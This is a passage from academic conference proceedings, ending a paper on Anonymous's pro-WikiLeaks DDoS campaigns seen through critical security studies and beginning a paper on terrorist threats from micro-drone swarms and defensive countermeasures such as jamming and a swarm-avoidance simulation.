coherent analysis of their activity. Identity should be understood as an ongo<strong>in</strong>g cont<strong>in</strong>ual process rather<br />
than a settled descriptor or essential unchang<strong>in</strong>g aspect. For Fierke it is a social category that<br />
<strong>in</strong>corporates the self-ascribed identity that the <strong>in</strong>dividual actor gives themselves, but also the def<strong>in</strong>itions<br />
one ascribes to others and have ascribed upon them (Fierke 2007, p.76). Identity is fundamentally<br />
relational.<br />
Anonymous describes itself as ‘not a group, but rather an <strong>in</strong>ternet gather<strong>in</strong>g’ (ANONOPS press release),<br />
but this is itself problematic. There is no membership structure, no officers, designated representatives or<br />
legal existence. One can jo<strong>in</strong> simply by claim<strong>in</strong>g so (or even by identify<strong>in</strong>g with Anonymous). Be<strong>in</strong>g on<br />
certa<strong>in</strong> forums will make you more aware of what it is do<strong>in</strong>g and able to participate <strong>in</strong> its functions.<br />
However one can speak for Anonymous by simply do<strong>in</strong>g so (and <strong>in</strong> a sense, every Anon forum post does<br />
so), although how seriously this is taken by a range of <strong>in</strong>terested actors will vary. One is a member of<br />
Anonymous simply to the extent that one recognises oneself as a member of Anonymous. Whilst<br />
spokespeople for Anonymous have communicated with ma<strong>in</strong>stream media (for example ‘Coldblood’ was<br />
<strong>in</strong>terviewed on the BBC Radio 4 ‘Today’ programme) this language mirrors that used <strong>in</strong> other protest<br />
movements. Students <strong>in</strong> Paris <strong>in</strong> 1968, and anti-globalisations activists <strong>in</strong> the late 1990s both regularly<br />
stated that their representatives were only spokespeople, not leaders.<br />
This draws upon a consensus/participation model, <strong>in</strong> which if an identify<strong>in</strong>g <strong>in</strong>dividual doesn’t like a<br />
particular action, they can simply not participate <strong>in</strong> this action without any <strong>in</strong>-group consequences. Nor is<br />
Anonymous without <strong>in</strong>ternal discussion. For example the use of denial of service attacks has not been<br />
without its <strong>in</strong>ternal criticism and caution has been expressed that cont<strong>in</strong>ued DDOS attacks will promote a<br />
public backlash backlash (Keane 2011). An anonymous press release discussees the groups<br />
relationshop with WikiLeaks and argues that the association is primarily a shared set of ethics and<br />
political goals.<br />
“while we don’t have much of an affiliation with WikiLeaks, we fight for the same reasons. We want<br />
transparency and we counter censorship. The attempts to silence wikileaks are long strides closer to a<br />
world where we can not say what we th<strong>in</strong>k and are unable to express our op<strong>in</strong>ions and ideas.”<br />
(http://pandalabs.pandasecurity.com)<br />
21
David Barnard-Wills<br />
The extent to which the members are known to each other is open to question. Ottis discussed cyber<br />
militia with relatively loose ties, which require them to communicate onl<strong>in</strong>e. Anonymous, and its orig<strong>in</strong>s <strong>in</strong><br />
4Chan arguably have a different relationship. To talk, as Ottis does, of ‘real life’ connections is to miss the<br />
po<strong>in</strong>t somewhat, and negate the importance of onl<strong>in</strong>e created and lived identities. Ottis suggests that this<br />
lack of ‘real world’ connections creates a particular vulnerability to <strong>in</strong>formation operations techniques<br />
(Ottis 2010b, p.2). However some connections <strong>in</strong> these onl<strong>in</strong>e environments can be very deep, very<br />
detailed and very mean<strong>in</strong>gful. Of course, other connections can be very ephemeral. It is hard however to<br />
disentangle the two from an external perspective.<br />
The concepts of Hegemony democratic demands provide us with potential analytical purchase upon the<br />
anonymous cyber attacks. The Marxist philosopher and social theorist Antonio Gramsci (1891-1937)<br />
theory of hegemony was part of an attempt to overcome the economic determ<strong>in</strong>ism of Marxist thought.<br />
Rather than be<strong>in</strong>g determ<strong>in</strong>ed by the economic substructure, explanations of social change were <strong>in</strong>stead<br />
to be found <strong>in</strong> the relatively autonomous realm of ideas and ideology. This was to emphasise the role of<br />
human agency and choice. Hegemony is the ability to ga<strong>in</strong> control of ideas that manipulate social<br />
consciousness. Rather than be<strong>in</strong>g solely determ<strong>in</strong>ed from above, this was ‘a negotiation between the<br />
dom<strong>in</strong>ant and controlled class over what the latter will accept to believe and what they will not swallow’<br />
(Woodf<strong>in</strong> & Zarate 2004, p.123), and as such was an ongo<strong>in</strong>g process. In try<strong>in</strong>g to expla<strong>in</strong> the uneven<br />
and unsuccessful nature of socialist revolution across Europe <strong>in</strong> the early 20 th century, Gramsci<br />
suggested that revolution can only take place if there is a genu<strong>in</strong>e alternative worldview accepted by the<br />
widest range of exploited social groups.<br />
For Laclau, for a political demand to be classed as democratic, it must meet two criteria. Firstly, that it is a<br />
demand formulated to the system by an underdog of some k<strong>in</strong>d. Because of this it carries an egalitarian<br />
dimension. Secondly, the very emergence of a democratic demand presupposes some k<strong>in</strong>d of exclusion<br />
or deprivation (Laclau 2005, p.125). Laclau’s analysis of populist reason and the emergence of collective<br />
group identities suggests that it is the mak<strong>in</strong>g of demands that cannot be fulfilled that is necessary for the<br />
emerge of shared identities (Laclau 2005, p.127). Given that Laclau’s study is addressed to populist<br />
social movements for example those <strong>in</strong> East Europe or Lat<strong>in</strong> America, these shared identities are often<br />
‘the people’ – however we can identify certa<strong>in</strong> similarities with collective identities such as that articulated<br />
by Anonymous and other WikiLeaks supporters. The Anonymous press release sums this up by say<strong>in</strong>g<br />
‘we are not a group of hackers, we are average Internet Citizens’ (Anonymous 2010). The January 28 th<br />
press release does however also refer to Anonymous as ‘the people’ (Anonymous 2010). Any essential<br />
characteristics of membership are effaced <strong>in</strong> their communication, which stresses <strong>in</strong>clusion and ideas.<br />
Whilst we can anticipate some demographic striations (age, gender, language etc) of participants, these<br />
are not seen as important to the communicators.<br />
‘an <strong>in</strong>terest <strong>in</strong> freedom and openness belongs to a world of liberal democracies where these<br />
practices are tied to legitimacy’(Fierke 2007, p.80).<br />
We can therefore contextualise Anonymous as an open expansive movement driven by a set of values<br />
formed around the onl<strong>in</strong>e environment, freedom, and lack of censorship. Perceiv<strong>in</strong>g WikiLeaks as<br />
ideologically aligned, members recognise this value set and identify themselves as member of<br />
anonymous and a wider <strong>in</strong>cipient non-state collective identity as <strong>in</strong>ternet citizens. The impossible<br />
demands for absolute freedom of speech solidifies the group identity <strong>in</strong> the face of external contestation.<br />
Their target is not system security but rather a much broader communicative field, not a power-politics,<br />
but a more discursive one – DDoS as communicative act and presentation of nascent political identity.<br />
5. Conclusions<br />
It is fairly unproblematic to suggest that the digitally mediated contestation between the hacktivist group<br />
Anonymous <strong>in</strong> support of WikiLeaks and various onl<strong>in</strong>e payments providers is not an example of war. It is<br />
however an example of how complicated a multi-actor <strong>in</strong>ternational political environment can be and how<br />
a traditional state-centric perspective on security is fundamentally flawed <strong>in</strong> the cyber doma<strong>in</strong>. To this end<br />
the paper suggests draw<strong>in</strong>g upon critical security studies perspectives from International Relations and<br />
social theory. The Copenhagen school account of the process of securitization allows us to understand<br />
the importance of language and speech acts <strong>in</strong> creat<strong>in</strong>g and ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g a security environment, and<br />
suggests caution <strong>in</strong> the application of the label ‘war’. Secondly, the perspective also suggests attention<br />
towards the identities, values and processes of group formation which br<strong>in</strong>g together a loose coalition of<br />
onl<strong>in</strong>e actors <strong>in</strong> support of particular value set and political position. This account is a useful corrective to<br />
accounts of ‘patriotic hackers’ or ‘cyber jihad’, and it is hoped that wider adoption of the theoretical tools<br />
22
David Barnard-Wills<br />
and perspectives of critical security studies <strong>in</strong> the field of cyber conflict can allow it to move beyond<br />
shallow and empirically lack<strong>in</strong>g models.<br />
References<br />
Amazon Web Services, 2010. Message. Available at: http://aws.amazon.com/message/65348/ [Accessed February<br />
2, 2011].<br />
Anonymous, 2010. ANON OPS: A Press Release. Available at:<br />
http://www.wired.com/images_blogs/threatlevel/2010/12/ANONOPS_The_Press_Release.pdf [Accessed<br />
January 28, 2011].<br />
Associated Press, 2011. The Associated Press: No proof WikiLeaks break<strong>in</strong>g law, <strong>in</strong>quiry f<strong>in</strong>ds. Available at:<br />
http://www.google.com/hostednews/ap/article/ALeqM5jwrDLCLioMJW7qeke8jNQP3_vGLg?docId=8824887824<br />
cc4c89982bbe407c103304 [Accessed January 31, 2011].<br />
Barnard-Wills, D. & Ashenden, D., <strong>Security</strong> Virtual Space: Cyberwar, Cyberterror and Risk. Space and Culture<br />
Bobbitt, P., 2008. Terror and consent : the wars for the twenty-first century, London: Allen Lane.<br />
Buzan, B., Waever, O. & de Wilde, J., 1998. <strong>Security</strong>: A New Framework for Analysis, London: Lynne Rienner.<br />
Coker, C., 2009. War <strong>in</strong> an age of risk, Cambridge: Polity.<br />
Cox, R., 1981. Social Forces, States and World Orders: Beyond International Relations Theory. Millenium: Journal of<br />
International Studies, (10), 126-155.<br />
FBI National Press Office, 2011. FBI — Search Warrants Executed <strong>in</strong> the United States as Part of Ongo<strong>in</strong>g Cyber<br />
Investigation. Available at: http://www.fbi.gov/news/pressrel/press-releases/warrants_012711 [Accessed<br />
January 28, 2011].<br />
Fierke, K., 2007. Critical approaches to <strong>in</strong>ternational security, Cambridge: Polity.<br />
Jackson, R., 2005. Writ<strong>in</strong>g the war on terrorism : language, politics and counter-terrorism, Manchester: Manchester<br />
University Press.<br />
Keane, B., 2011. Anonymous arrests sh<strong>in</strong>e a light on some (much) bigger issues – The Stump. Crikey.com. Available<br />
at: http://blogs.crikey.com.au/thestump/2011/01/30/anonymous-arrests-sh<strong>in</strong>e-a-light-on-some-much-biggerissues/<br />
[Accessed January 31, 2011].<br />
Laclau, E., 2005. On populist reason, London ;;New York: Verso.<br />
Munroe, I., 2005. Information Warfare <strong>in</strong> Bus<strong>in</strong>ess: Strategies of Control and Resistance <strong>in</strong> the Network Society.,<br />
London: Routledge.<br />
Nissenbaum, H., 2005. Where Computer <strong>Security</strong> Meets National <strong>Security</strong>. Ethics and Information Technology, 7(2),<br />
61-73.<br />
Nye, J., 2010. Cyber Power, Harvard: Belfer Center for Science and International Affairs.<br />
Ottis, R., 2010a. From Pitchforks to Laptops: volunteers <strong>in</strong> Cyber Conflicts. In Conference on Cyber Conflict<br />
Proceed<strong>in</strong>gs 2010. Tall<strong>in</strong>n, Estonia: CCD COE Publications, pp. 97-109. Available at:<br />
http://www.ccdcoe.org/articles/2010/Ottis_FromPitchforks.pdf.<br />
Ottis, R., 2010b. Proactive Defense Tactics Aga<strong>in</strong>st On-L<strong>in</strong>e Cyber Militia, Cooperative Cyber Defence Centre of<br />
Excellence.<br />
PayPal, 2010. PayPal statement regard<strong>in</strong>g WikiLeaks. Available at: https://www.thepaypalblog.com/2010/12/paypalstatement-regard<strong>in</strong>g-wikileaks/<br />
[Accessed February 2, 2011].<br />
Peoples, C. & Vaughan-Williams, N., 2009. Critical security studies : an <strong>in</strong>troduction, London: Routledge.<br />
Project Grey Goose, 2008. Russia/Georgia Cyber War - F<strong>in</strong>d<strong>in</strong>gs and Analysis, Available at:<br />
http://www.scribd.com/doc/6967393/Project-Grey-Goose-Phase-I-Report.<br />
The Guardian, 2011. Police arrest five over Anonymous WikiLeaks attacks. The Guardian. Available at:<br />
http://www.guardian.co.uk/technology/2011/jan/27/anonymous-hack<strong>in</strong>g?INTCMP=SRCH [Accessed January<br />
28, 2011].<br />
Woodf<strong>in</strong>, R. & Zarate, O., 2004. Introduc<strong>in</strong>g Marxism, Royston: Icon.<br />
Zukerman, E. et al., 2010. Distributed Denial of Service Attacks Aga<strong>in</strong>st Indepdent Media and Human Rights Sites,<br />
The Berkman Center for Internet & Society at Harvard University. Available at:<br />
http://cyber.law.harvard.edu/sites/cyber.law.harvard.edu/files/2010_DDoS_Attacks_Human_Rights_and_Media.<br />
pdf [Accessed January 28, 2011].<br />
23
Potential Threats of UAS Swarms and the Countermeasure’s<br />
Need<br />
Laurent Beaudo<strong>in</strong>, Anto<strong>in</strong>e Gademer, Loica Avanthey, V<strong>in</strong>cent Germa<strong>in</strong> and<br />
V<strong>in</strong>cent Vittori<br />
ESIEA, ATIS Dept., Paris, France<br />
beaudo<strong>in</strong>@esiea.fr<br />
gademer@esiea.fr<br />
Abstract: The ris<strong>in</strong>g capabilities and grow<strong>in</strong>g accessibility of recent Unmanned Aerial Systems (UAS) widen the risks<br />
of success of a terrorists attack through the current aerial defence systems. We will exam<strong>in</strong>e first the complexity of<br />
the threats from a s<strong>in</strong>gle unmanned vehicle, to a team of unmanned vehicles and f<strong>in</strong>ally to a swarm of unmanned<br />
vehicles (and any other association of these three comb<strong>in</strong>ations). Then, from an operational po<strong>in</strong>t of view, we will see<br />
that early detection of danger - a critical stage <strong>in</strong> the development of counter-attacks - has become very difficult<br />
because small unmanned vehicles like UASs precisely possess the ability to take off directly with<strong>in</strong> the sphere of<br />
attack. The next stage, equally critical, consists <strong>in</strong> elaborat<strong>in</strong>g the response that best fits the attack. We dist<strong>in</strong>guish<br />
three general categories of active and passive countermeasures: destruction, <strong>in</strong>capacitation and jamm<strong>in</strong>g of the<br />
enemy UASs. We will then study several possible countermeasures appropriate to the type of attack (enemy’s<br />
formation: isolated drone, team, swarm; weapon type: bomb, kamikaze, bacteriological etc.). We first present<br />
countermeasures that are rather conventional (they usually come from air defense systems) and others specific to<br />
the UAS case. We will f<strong>in</strong>ish by a case study <strong>in</strong> which we will tackle the use of simplified physical models for<br />
calculat<strong>in</strong>g positions <strong>in</strong> real time <strong>in</strong> an optimized way <strong>in</strong> a UAS swarm under constra<strong>in</strong>ts.<br />
Keywords: unmanned aerial system, swarms, countermeasure, terrorism<br />
1. Introduction<br />
We previously presented the risks presented by the use of s<strong>in</strong>gle micro-UAS by terrorist groups given the<br />
current flaws <strong>in</strong> the aerial defence systems (Beaudo<strong>in</strong> & Gademer, 2010). This scenario is nowadays<br />
more than conceivable consider<strong>in</strong>g the ris<strong>in</strong>g capabilities of recent UASs and their grow<strong>in</strong>g accessibility.<br />
This perspective thus opens new breaches, even more dangerous than the previous ones, and renders<br />
obsolete most of the exist<strong>in</strong>g solutions.<br />
This article deals with the potential threats related to the use of micro UASs, which weigh less than 5<br />
kilograms, for terrorist purposes <strong>in</strong> two ways: the <strong>in</strong>creas<strong>in</strong>g level of automation of these systems and<br />
their new capacity for collaboration. In a second step, we will discuss the current counter measures to<br />
prevent or fight such situations. Then we will widen the debate with a case study that <strong>in</strong>cludes the<br />
prospects offered by collaborative systems <strong>in</strong> terms of counter-measures.<br />
2. Technological abilities for new threats<br />
2.1 Unmanned Vehicle Systems (UVSs) and level of automation<br />
Automated unmanned vehicles are robots of different sizes (Abatti et al., 2005), carry<strong>in</strong>g no human on<br />
board, but designed to fulfil various types of missions known as the three "Ds" (Dull, Dirty or Dangerous).<br />
They can be remotely controlled or follow a predeterm<strong>in</strong>ed plan or react to their environment, or even use<br />
a comb<strong>in</strong>ation of the three previous situations. In the literature (Christ, 2007, S<strong>in</strong>ger, 2009), robots are<br />
often spoken about, and you can f<strong>in</strong>d a lot of autonomy scales. But more than the autonomy (which is a<br />
bit anthropomorphic) we prefer to def<strong>in</strong>e an automation scale.<br />
We will dist<strong>in</strong>guish several levels of automation:<br />
Level 1: Slave (assisted pilot<strong>in</strong>g, disturbance compensation)<br />
Level 2: Automated (ma<strong>in</strong>ta<strong>in</strong>s its orders and takes high level orders)<br />
Level 3: Automatic Navigation (a priori mission plan)<br />
Level 4: Response from contextual data (dodg<strong>in</strong>g) without human <strong>in</strong>tervention<br />
Level 5: Decision-maker (expert system) from contextual data (navigation <strong>in</strong> unknown environment,<br />
realization of complex missions, coord<strong>in</strong>ation)<br />
Levels 1 and 2 require the <strong>in</strong>tervention of a pilot dur<strong>in</strong>g the mission and therefore a cont<strong>in</strong>uous<br />
communication l<strong>in</strong>k between himself and the UVS dur<strong>in</strong>g the attack.<br />
24
Laurent Beaudo<strong>in</strong>et al.<br />
At level 3, the system is <strong>in</strong>dependent of the pilot and knows how to place itself <strong>in</strong> its environment. For<br />
this, it relies on passive sensors (AHRS, GPS, clock…) and bl<strong>in</strong>dly follows the mission plan that has been<br />
given to it beforehand. This <strong>in</strong>volves a detailed knowledge of the place <strong>in</strong> which the mission will take<br />
place to make sure everyth<strong>in</strong>g goes smoothly.<br />
At level 4, the system has a m<strong>in</strong>imum knowledge of its surround<strong>in</strong>g environment and can react to events<br />
such as perform<strong>in</strong>g collision avoidance. To do this it uses a number of active sensors (distance<br />
measurement, short range communications, etc.), but the establishment of an accurate mission plan<br />
beforehand rema<strong>in</strong>s a fundamental element.<br />
Level 5 <strong>in</strong>troduces concepts of artificial <strong>in</strong>telligence and decision-mak<strong>in</strong>g that require significant<br />
comput<strong>in</strong>g power. To take full advantage of these new features, many perceptive sensors are usually<br />
added, as well as a large storage capacity that allows the robot to make <strong>in</strong>ferences from the state of its<br />
environment, both <strong>in</strong> space and time. These robots are able to realize complex missions <strong>in</strong> unexplored<br />
environments, to <strong>in</strong>teract with them <strong>in</strong> a mean<strong>in</strong>gful way, or to reschedule an ongo<strong>in</strong>g mission because of<br />
encountered events.<br />
The higher the level of automation is, the more the human cost and risk is m<strong>in</strong>imized from the po<strong>in</strong>t of<br />
view of the attacker and the greater the probability of an unexpected attack <strong>in</strong>creases (because fewer<br />
staff are <strong>in</strong>volved upstream and on field). The impact on the f<strong>in</strong>ancial cost is more complex to measure,<br />
because it is much more <strong>in</strong>fluenced by the material cost of the device (due to the payload and the<br />
number of sensors) than by the embedded <strong>in</strong>telligence (software part). In what follows, we will apply the<br />
previous scale to micro-UASs. Given the current technological breakthroughs available at a lower cost,<br />
micro UASs represent new threats. Moreover, the multiplication of supply depots all over the world makes<br />
it impossible to survey or to detect suspicious <strong>in</strong>dividuals or groups. If you look at what exists today on<br />
the market for micro-UASs (less than 5 kg category) and given what we just described, we can<br />
dist<strong>in</strong>guish three cases:<br />
Levels 1 and 2 which are relatively common, with reasonable prices. We f<strong>in</strong>d material for fly<strong>in</strong>g model<br />
aircraft (
Isolated <strong>in</strong>dividuals<br />
Laurent Beaudo<strong>in</strong>et al.<br />
The most basic case is about the isolated <strong>in</strong>dividual (Beaudo<strong>in</strong> & Gademer, 2010). The UAS can be<br />
piloted or autonomous and has a specific mission to perform. Small <strong>in</strong> size, easy to assemble, affordable<br />
to fly, some models can even embed a light payload. They have all the assets to be used for terrorists<br />
operations <strong>in</strong> the close future. However, if the pilot or the UAS is stopped, disabled or destroyed, the<br />
threat is removed.<br />
A group of <strong>in</strong>dividuals<br />
A group of UASs is composed of several isolated <strong>in</strong>dividuals, each with their own mission without<br />
coord<strong>in</strong>ation. Their sphere of action does not necessarily lie on the same location and each unit can be<br />
considered as the case described <strong>in</strong> the previous paragraph. But by <strong>in</strong>creas<strong>in</strong>g the number of <strong>in</strong>dividuals,<br />
we multiply the probability of a successful attack by try<strong>in</strong>g to saturate the defense’s capabilities. The<br />
ma<strong>in</strong> advantage of the group is that it does not need any collaboration among the <strong>in</strong>dividuals and thus<br />
does not need advanced collaborative capacity.<br />
Team of UASs<br />
A team of UASs can be seen as a group <strong>in</strong> which all members are assigned specialized tasks and are<br />
usually coord<strong>in</strong>ated by a chief. Team formation is particularly effective: the objectives are divided and<br />
each member can focus on achiev<strong>in</strong>g its task. With UASs on the third level (automatic navigation) of the<br />
automation scale, you will have synchronized action but no possibility to update the mission plan<br />
accord<strong>in</strong>g to what happens on the field. The fourth level (without human <strong>in</strong>tervention) will give you<br />
reaction to the surround<strong>in</strong>gs but may lead to a fatal loss of synchronization between the team members,<br />
which quickly leads to us<strong>in</strong>g UASs of the fifth level. At this step, all members are communicat<strong>in</strong>g with<br />
each other and the leader chooses what to do next. So the action is fast and has th<strong>in</strong>gs <strong>in</strong> common with a<br />
commando operation.<br />
The missions that a team can perform could be far more complex than the one <strong>in</strong> the previous case.<br />
The team strength is also its weakness: the more each member is highly specialized, the more the<br />
destruction of a key element can jeopardize the whole mission (coord<strong>in</strong>ator UAS, UAS with the lethal<br />
load, UAS dedicated to the collection of <strong>in</strong>formation...). Survival of team-members is therefore critical and<br />
fundamental to the proper perform<strong>in</strong>g of the mission.<br />
The enemy can also try to predict the behaviour of a team, <strong>in</strong> a certa<strong>in</strong> way, because it usually works<br />
follow<strong>in</strong>g a logical reason<strong>in</strong>g, and so it is possible for him to act accord<strong>in</strong>gly.<br />
Swarm of UASs<br />
A swarm, unlike a team, is made of a uniform mass of undifferentiated <strong>in</strong>dividuals (Clough, 2002). The<br />
robots form<strong>in</strong>g a swarm are at least of the fourth level on the automation scale. The swarm has no “chief”<br />
or “organization”. Its efficiency is based on the emergent behaviors related to the large number of<br />
<strong>in</strong>dividuals and their <strong>in</strong>teractions, that’s why they cannot be controlled and need to be automated. The<br />
<strong>in</strong>telligence is decentralized (Frantz, 2005): each <strong>in</strong>dividual <strong>in</strong>teracts with others on the same basis of<br />
simple rules describ<strong>in</strong>g the reactions of <strong>in</strong>dividuals to their local environment (like a shoal of fish).<br />
This decentralization, comb<strong>in</strong>ed with the large number of <strong>in</strong>dividuals, allows the swarm to be a highly<br />
resistant form (Chaumette et al., 2010). If some <strong>in</strong>dividuals disappear, it will have little <strong>in</strong>fluence on the<br />
conduct of the mission. The result<strong>in</strong>g action is certa<strong>in</strong>ly less efficient, but the mission can still succeed.<br />
Similarly, the swarm is resistant to local disturbances or to the addition of new <strong>in</strong>dividuals <strong>in</strong>to the system,<br />
the overall behaviour is the only one taken <strong>in</strong>to account.<br />
However, the behaviour of the swarm is only based on <strong>in</strong>dividuals' reactions. So it is not determ<strong>in</strong>istic<br />
(Lamont, 2007, 2008). Then, we can only estimate a probability of success, even <strong>in</strong> a favourable<br />
situation, which is far removed from the optimum way of the team work. The ma<strong>in</strong> strength of a swarm, its<br />
distributed <strong>in</strong>telligence and its lack of hierarchical bonds, is also its ma<strong>in</strong> weakness, which is its lack of<br />
strategic global view.<br />
26
Laurent Beaudo<strong>in</strong>et al.<br />
F<strong>in</strong>ally, the apparence of the swarm itself can fulfil another objective <strong>in</strong> psychological warfare. Indeed, it<br />
can <strong>in</strong>spire both fear and powerlessness <strong>in</strong>to the collective unconscious as for example <strong>in</strong> “The Birds” of<br />
Hitchcock, or like the killer bees from South America, the ants <strong>in</strong> Indiana Jones, or grasshopper clouds.<br />
3. The vulnerability of exist<strong>in</strong>g defense systems and counter measures<br />
3.1 Vulnerability of present defense systems and attacks by micro-UASs<br />
In practice, defense systems <strong>in</strong> simplified can be viewed as the achievement of two critical phases:<br />
detection and identification of the danger and counteraction through appropriate response while<br />
restrict<strong>in</strong>g collateral damage.<br />
The traditional tools of detection used by air defence systems can be categorized <strong>in</strong>to two families:<br />
Active radar surveillance: they generate waves and use the rebound of the echoes on potential fly<strong>in</strong>g<br />
objects to locate them. From there, it is possible to estimate their distance, their speed of approach,<br />
the penetration vector, and even have an idea about their trajectory (at least <strong>in</strong> the short term) and<br />
their size.<br />
Monitor<strong>in</strong>g by passive observation of the electromagnetic spectrum, either <strong>in</strong> the visible or thermal<br />
<strong>in</strong>frared or by listen<strong>in</strong>g to the radio waves on the common communication channels.<br />
In practice, the data fusion of multiple sensors allows to reduce noise and false alarms to the maximum<br />
while ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g reliability. Except unusual cases, the bigger the device is, the easier it is to notice.<br />
Usually the defence systems are optimized to detect aircraft or missiles. They both move at a rather high<br />
altitude and reach substantial speeds dur<strong>in</strong>g the approach stage of the target.<br />
The ma<strong>in</strong> problem posed by micro-UASs is that the approach stage can be practically non-existent,<br />
because their small size allows them to be launched <strong>in</strong>to action very close by the target (Carnu, 2010 ;<br />
Miasnikov, 2005; Gademer, 2009, 2010, 2010a) . This cancels the long range defensive strategies and<br />
raises the problem of reactivity from the decision l<strong>in</strong>e. Reactivity that has to be all the quicker as we are<br />
near the target. Their slow flight at a very low altitude is an aggravat<strong>in</strong>g factor that <strong>in</strong>creases the<br />
probability of non-detection. Moreover, their electric motors do not leave a thermal signature, which<br />
makes their detection extremely difficult.<br />
F<strong>in</strong>ally, the topography of the theatre of war can also be an additional factor of complexity, as <strong>in</strong> the case<br />
of an urban environment. Here, the sphere of attack is limited. Therefore the <strong>in</strong>terception stage <strong>in</strong>evitably<br />
takes place near the target, so probably with<strong>in</strong> the urban environment itself. Thus the risk of collateral<br />
damage is much higher.<br />
3.2 Counter-measures aga<strong>in</strong>st these new threats<br />
Once the danger is detected, it is then necessary to determ<strong>in</strong>e accord<strong>in</strong>g to the context the best adapted<br />
countermeasure. There are two big families of countermeasures (Mirkarimi et al., 2003, Haulman, 2003).<br />
The first family, the active one, tries to <strong>in</strong>capacitate or to destroy the threat <strong>in</strong> a direct way (systems of airto-ground<br />
defence for example). The second, the passive one, tries to protect from the danger <strong>in</strong> an<br />
<strong>in</strong>direct way (physical protections around the target, the use of decoys, organized by systems of<br />
communications or of jamm<strong>in</strong>g of the sensors of the aggressor as will be detailed <strong>in</strong> the practical case<br />
part).<br />
The first active countermeasures to fight aga<strong>in</strong>st micro-UASs are <strong>in</strong>spired by classic anti-aircraft<br />
defences. However, if the latter showed their ability on "classic" targets, their efficiency aga<strong>in</strong>st smaller<br />
and more reactive targets is much more mitigated, especially <strong>in</strong> urban zones with the public at risk. These<br />
methods are also difficult to apply aga<strong>in</strong>st enemies attack<strong>in</strong>g simultaneously on multiple fronts, even if we<br />
<strong>in</strong>crease the ability of the defence system to react and make its saturation limit recede. The team mode of<br />
operation should besides allow implement<strong>in</strong>g operational strategies (decoys, shields, rams) which<br />
complicates at the same time the stage of detection and <strong>in</strong>terception. The swarm, on the other hand,<br />
should be easier to detect globally because it is not evident to mask the arrival of a cloud of robot craft,<br />
but it should show itself on the other hand much tougher to neutralize.<br />
The passive countermeasures based on the physical protection of the target (<strong>in</strong>stallation of nets for<br />
example) are last resort solutions. However, with<strong>in</strong> the context of attack by micro-UAS, these solutions<br />
can be effective because of the small size of the robots. The use of decoys supposes that we know a<br />
27
Laurent Beaudo<strong>in</strong>et al.<br />
priori the sensors used by the drone to make his kamikaze attack and how this <strong>in</strong>formation is used<br />
particularly <strong>in</strong> the f<strong>in</strong>al phase. The jamm<strong>in</strong>g of communication would appear to be effective aga<strong>in</strong>st<br />
drones of level 1 or 2 which require the control of a pilot. It can also prove <strong>in</strong>terest<strong>in</strong>g to perturb the <strong>in</strong>terdrones<br />
communication required for a team or a swarm. The jamm<strong>in</strong>g of the sensors (false GPS<br />
<strong>in</strong>formation, camera dazzl<strong>in</strong>g, magnetic disturbance of the head<strong>in</strong>g sensor) can also be an effective<br />
approach, whatever the level of automation.<br />
4. Case study of a UAS swarm<br />
4.1 Operational context<br />
As we have seen previously, there can be a high operational <strong>in</strong>terest to locally jam GPS cover. But a loss<br />
of the signal can easily be detected by the attacker who can then activate a ploy like estimat<strong>in</strong>g the<br />
course, the ground-speed and a timer <strong>in</strong> order to nonetheless reach the area of the target. More<br />
<strong>in</strong>terest<strong>in</strong>g is the case <strong>in</strong> which we only slightly modify the GPS signal to give false positions to the<br />
attackers <strong>in</strong> order to lure them <strong>in</strong>to a chosen area. For the attacker, this strategy of defence is much more<br />
difficult to detect. In every case, this strategy can be complicated to apply on an area with fixed facilities,<br />
furthermore if the perimeter of the area to protect is mobile. A possible solution could be to use a swarm<br />
of UAS, each of them hav<strong>in</strong>g an action (eventually mobile) of locally jamm<strong>in</strong>g. In this hypothesis, we use<br />
the swarm <strong>in</strong> a situation of defence. As for the aggressor, a solution could be to perform a kamikaze<br />
attack <strong>in</strong> order to create a breach <strong>in</strong> the defence system <strong>in</strong> position. In our next section, we will show an<br />
example an <strong>in</strong>novat<strong>in</strong>g demonstrator to test scenarios of swarm-based attack and defence <strong>in</strong> a given<br />
operational context.<br />
4.2 Operational modell<strong>in</strong>g of a swarm <strong>in</strong> defense<br />
To cont<strong>in</strong>ue work<strong>in</strong>g, the swarm will have to respond to the suicide bomber attack. The maneuver that is<br />
least costly <strong>in</strong> human resources will be a dodge to avoid contact with the bomber, but also with other<br />
UASs of the swarm. However, <strong>in</strong> order to have an operational <strong>in</strong>terest, we will have at the same time to<br />
m<strong>in</strong>imize the deformation of the network of the UAS swarm. F<strong>in</strong>ally, to check the operational feasibility of<br />
these solutions, we want to be able to perform the associated calculations locally and almost <strong>in</strong>stantly,<br />
which excludes conventional solutions such as those based on numerical model<strong>in</strong>g of virtual reality. To<br />
accommodate the constra<strong>in</strong>ts, we propose to develop a demonstrator adapt<strong>in</strong>g a physical library<br />
(Chipmunk) ma<strong>in</strong>ly used <strong>in</strong> video games on smart-phones. This pragmatic approach allows us to<br />
leverage for our problem all the improvements and developments made by the video game <strong>in</strong>dustry for<br />
which resource constra<strong>in</strong>ts and time calculations are close to what we want. The problem then is to f<strong>in</strong>d<br />
how to model our problem <strong>in</strong> the range of tools available <strong>in</strong> the library. The modell<strong>in</strong>g solution that we<br />
propose for the demonstrator is:<br />
Avoidance of UAS done through a repulsive force like the Coulomb one so as 1 / r ², where r is the<br />
distance between the UASs.<br />
M<strong>in</strong>imiz<strong>in</strong>g deformation of the mesh done by l<strong>in</strong>k<strong>in</strong>g the UASs with their neighbours <strong>in</strong> eight<br />
connexions by restor<strong>in</strong>g forces <strong>in</strong> the manner of a spr<strong>in</strong>g where the coefficient of stiffness and length<br />
at rest reflect the physical reality (UAS’s reactivity and <strong>in</strong>ter-UAS distance respectively).<br />
Figure 2 shows the physical network of the modelization. The big square is the attack UAS, and the small<br />
ones the defend UAS. The images shows different position of the attack UAS and the re-organized<br />
response of the defend UAS.<br />
Figure 2: Modelization<br />
28
Laurent Beaudo<strong>in</strong>et al.<br />
Figure 3 shows screen shots of the demonstrator. This reacts <strong>in</strong> near real time. The model<strong>in</strong>g approach<br />
shows the desired behavior (deformation of the mesh of the swarm optimized and UAS-UAS avoidance<br />
made).<br />
Figure 3: Demonstrator<br />
From this demonstrator, we can draw two <strong>in</strong>itial conclusions:<br />
The real-time constra<strong>in</strong>ts can be totally satisfied on architectures with limited comput<strong>in</strong>g power, and<br />
therefore be available <strong>in</strong> operation.<br />
The modell<strong>in</strong>g shows that it is virtually impossible for the attacker to destroy or disrupt the defender’s<br />
swarm effectively, unless he develops abilities to move very much faster than those of the defenders.<br />
